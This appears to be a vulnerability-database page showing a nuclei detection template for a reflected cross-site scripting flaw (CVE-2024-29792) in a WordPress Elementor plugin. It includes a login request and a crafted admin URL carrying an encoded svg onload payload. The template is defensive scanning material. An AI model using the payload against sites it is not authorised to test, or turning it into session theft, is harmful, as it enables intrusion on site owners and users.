Lucene search
K

Unlimited Elements for Elementor <= 1.5.93 - Cross Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Unlimited Elements for Elementor up to 1.5.93 has a reflected cross-site scripting flaw via a crafted URL.

Related
Refs
Code
id: CVE-2024-29792

info:
  name: Unlimited Elements for Elementor <= 1.5.93 - Cross Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    Unlimited Elements For Elementor (Free Widgets, Addons, Templates) versions up to 1.5.93 contain a reflected cross-site scripting caused by improper neutralization of input during web page generation, letting attackers execute malicious scripts in the victim's browser, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to version 1.5.94 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29792
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor/unlimited-elements-for-elementor-1593-reflected-cross-site-scripting
    - https://plugins.trac.wordpress.org/changeset/3057553/unlimited-elements-for-elementor
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-29792
    epss-score: 0.0074
    epss-percentile: 0.5015
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/unlimited-elements-for-elementor"
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,unlimited-elements-for-elementor,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=unlimitedelements&view=settingselementor&google_connect_error=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, '<svg onload=alert(document.domain)>', 'unlimited-elements-for-elementor')
        condition: and
# digest: 4b0a00483046022100fd070ac6bc650c6c821becbc7f253b0e11ddc002ee750786b4b760ac0618c5ac022100eacd1a01d36ae9ec761e7f40ba65bba7703af49e620e034398d943b1f7ba8c97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1 - 7.1
EPSS0.0074
SSVC
6